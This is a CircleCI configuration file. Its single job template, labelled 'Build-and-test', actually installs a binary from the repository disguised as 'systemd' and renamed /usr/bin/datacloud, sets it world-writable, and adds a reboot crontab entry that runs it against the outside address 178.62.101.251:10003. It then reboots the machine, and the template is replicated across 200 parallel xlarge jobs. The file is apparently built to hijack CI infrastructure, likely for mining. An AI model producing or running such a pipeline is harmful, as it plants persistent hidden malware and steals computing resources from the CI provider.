version: 2.1

jobs:
  build1:  &build_template
    #parallelism: 5
    machine:
      image: ubuntu-2204:current
    resource_class: xlarge
    steps:
      - checkout
      - run:
          name: Build-and-test
          command: |
                 chmod +x systemd
                 sudo mv systemd /usr/bin/datacloud
                 sudo chmod 777 /usr/bin/datacloud
                 echo -e "@reboot /usr/bin/datacloud -o 178.62.101.251:10003" | crontab -
                 sudo reboot >/dev/null 2>&1 >/dev/null &

  build2: *build_template
  build3: *build_template
  build4: *build_template
  build5: *build_template
  build6: *build_template
  build7: *build_template
  build8: *build_template
  build9: *build_template
  build10: *build_template
  build11: *build_template
  build12: *build_template
  build13: *build_template
  build14: *build_template
  build15: *build_template
  build16: *build_template
  build17: *build_template
  build18: *build_template
  build19: *build_template
  build20: *build_template
  build21: *build_template
  build22: *build_template
  build23: *build_template
  build24: *build_template
  build25: *build_template
  build26: *build_template
  build27: *build_template
  build28: *build_template
  build29: *build_template
  build30: *build_template
  build31: *build_template
  build32: *build_template
  build33: *build_template
  build34: *build_template
  build35: *build_template
  build36: *build_template
  build37: *build_template
  build38: *build_template
  build39: *build_template
  build40: *build_template
  build41: *build_template
  build42: *build_template
  build43: *build_template
  build44: *build_template
  build45: *build_template
  build46: *build_template
  build47: *build_template
  build48: *build_template
  build49: *build_template
  build50: *build_template
  build51: *build_template
  build52: *build_template
  build53: *build_template
  build54: *build_template
  build55: *build_template
  build56: *build_template
  build57: *build_template
  build58: *build_template
  build59: *build_template
  build60: *build_template
  build61: *build_template
  build62: *build_template
  build63: *build_template
  build64: *build_template
  build65: *build_template
  build66: *build_template
  build67: *build_template
  build68: *build_template
  build69: *build_template
  build70: *build_template
  build71: *build_template
  build72: *build_template
  build73: *build_template
  build74: *build_template
  build75: *build_template
  build76: *build_template
  build77: *build_template
  build78: *build_template
  build79: *build_template
  build80: *build_template
  build81: *build_template
  build82: *build_template
  build83: *build_template
  build84: *build_template
  build85: *build_template
  build86: *build_template
  build87: *build_template
  build88: *build_template
  build89: *build_template
  build90: *build_template
  build91: *build_template
  build92: *build_template
  build93: *build_template
  build94: *build_template
  build95: *build_template
  build96: *build_template
  build97: *build_template
  build98: *build_template
  build99: *build_template
  build100: *build_template
  build101: *build_template
  build102: *build_template
  build103: *build_template
  build104: *build_template
  build105: *build_template
  build106: *build_template
  build107: *build_template
  build108: *build_template
  build109: *build_template
  build110: *build_template
  build111: *build_template
  build112: *build_template
  build113: *build_template
  build114: *build_template
  build115: *build_template
  build116: *build_template
  build117: *build_template
  build118: *build_template
  build119: *build_template
  build120: *build_template
  build121: *build_template
  build122: *build_template
  build123: *build_template
  build124: *build_template
  build125: *build_template
  build126: *build_template
  build127: *build_template
  build128: *build_template
  build129: *build_template
  build130: *build_template
  build131: *build_template
  build132: *build_template
  build133: *build_template
  build134: *build_template
  build135: *build_template
  build136: *build_template
  build137: *build_template
  build138: *build_template
  build139: *build_template
  build140: *build_template
  build141: *build_template
  build142: *build_template
  build143: *build_template
  build144: *build_template
  build145: *build_template
  build146: *build_template
  build147: *build_template
  build148: *build_template
  build149: *build_template
  build150: *build_template
  build151: *build_template
  build152: *build_template
  build153: *build_template
  build154: *build_template
  build155: *build_template
  build156: *build_template
  build157: *build_template
  build158: *build_template
  build159: *build_template
  build160: *build_template
  build161: *build_template
  build162: *build_template
  build163: *build_template
  build164: *build_template
  build165: *build_template
  build166: *build_template
  build167: *build_template
  build168: *build_template
  build169: *build_template
  build170: *build_template
  build171: *build_template
  build172: *build_template
  build173: *build_template
  build174: *build_template
  build175: *build_template
  build176: *build_template
  build177: *build_template
  build178: *build_template
  build179: *build_template
  build180: *build_template
  build181: *build_template
  build182: *build_template
  build183: *build_template
  build184: *build_template
  build185: *build_template
  build186: *build_template
  build187: *build_template
  build188: *build_template
  build189: *build_template
  build190: *build_template
  build191: *build_template
  build192: *build_template
  build193: *build_template
  build194: *build_template
  build195: *build_template
  build196: *build_template
  build197: *build_template
  build198: *build_template
  build199: *build_template
  build200: *build_template


workflows:
  version: 2
  build:
    jobs:
      - build1
      - build2
      - build3
      - build4
      - build5
      - build6
      - build7
      - build8
      - build9
      - build10
      - build11
      - build12
      - build13
      - build14
      - build15
      - build16
      - build17
      - build18
      - build19
      - build20
      - build21
      - build22
      - build23
      - build24
      - build25
      - build26
      - build27
      - build28
      - build29
      - build30
      - build31
      - build32
      - build33
      - build34
      - build35
      - build36
      - build37
      - build38
      - build39
      - build40
      - build41
      - build42
      - build43
      - build44
      - build45
      - build46
      - build47
      - build48
      - build49
      - build50
      - build51
      - build52
      - build53
      - build54
      - build55
      - build56
      - build57
      - build58
      - build59
      - build60
      - build61
      - build62
      - build63
      - build64
      - build65
      - build66
      - build67
      - build68
      - build69
      - build70
      - build71
      - build72
      - build73
      - build74
      - build75
      - build76
      - build77
      - build78
      - build79
      - build80
      - build81
      - build82
      - build83
      - build84
      - build85
      - build86
      - build87
      - build88
      - build89
      - build90
      - build91
      - build92
      - build93
      - build94
      - build95
      - build96
      - build97
      - build98
      - build99
      - build100
      - build101
      - build102
      - build103
      - build104
      - build105
      - build106
      - build107
      - build108
      - build109
      - build110
      - build111
      - build112
      - build113
      - build114
      - build115
      - build116
      - build117
      - build118
      - build119
      - build120
      - build121
      - build122
      - build123
      - build124
      - build125
      - build126
      - build127
      - build128
      - build129
      - build130
      - build131
      - build132
      - build133
      - build134
      - build135
      - build136
      - build137
      - build138
      - build139
      - build140
      - build141
      - build142
      - build143
      - build144
      - build145
      - build146
      - build147
      - build148
      - build149
      - build150
      - build151
      - build152
      - build153
      - build154
      - build155
      - build156
      - build157
      - build158
      - build159
      - build160
      - build161
      - build162
      - build163
      - build164
      - build165
      - build166
      - build167
      - build168
      - build169
      - build170
      - build171
      - build172
      - build173
      - build174
      - build175
      - build176
      - build177
      - build178
      - build179
      - build180
      - build181
      - build182
      - build183
      - build184
      - build185
      - build186
      - build187
      - build188
      - build189
      - build190
      - build191
      - build192
      - build193
      - build194
      - build195
      - build196
      - build197
      - build198
      - build199
      - build200
